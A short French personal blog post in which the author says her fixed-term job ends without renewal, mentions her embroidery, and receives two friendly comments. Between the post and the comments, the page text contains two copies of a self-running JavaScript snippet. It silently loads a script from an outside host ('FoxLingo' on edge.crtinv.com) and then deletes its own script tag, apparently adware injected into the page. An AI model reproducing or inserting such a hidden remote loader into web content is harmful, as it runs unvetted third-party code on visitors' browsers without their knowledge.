me revoilà ....

Publié le

noel-2.JPG

et oui sa fait bien longtemps que je suis venue vos faire un petit coucou.Je vais vous donner de mes nouvelles car je vais avoir le temps je suis à j -2 et oui mon contrat se termine samedi et elle ne le reconduit pas car sa fait trop longtemps que je suis en ddd .Cette éte je lui avait demander des congés et j'ai eu une  réponse négatif car je suis en cdd et je suis plus payé que les autres voilà l'argument de ma chef

autrement rien de neuf je brode un peut , ici il fait encore très bon le soleil et encore chaud

je vous dit a plus je vous souhaite une bonne fin de semaine

 

annecousin-mariage-patricia-.jpg

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();

!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
Pour être informé des derniers articles, inscrivez vous :
Commenter cet article
V
joli joli tout ça !
Répondre
B
Mignonnes tes broderies... On se tel pour se voir...bisous à vous tous .Brigitte
Répondre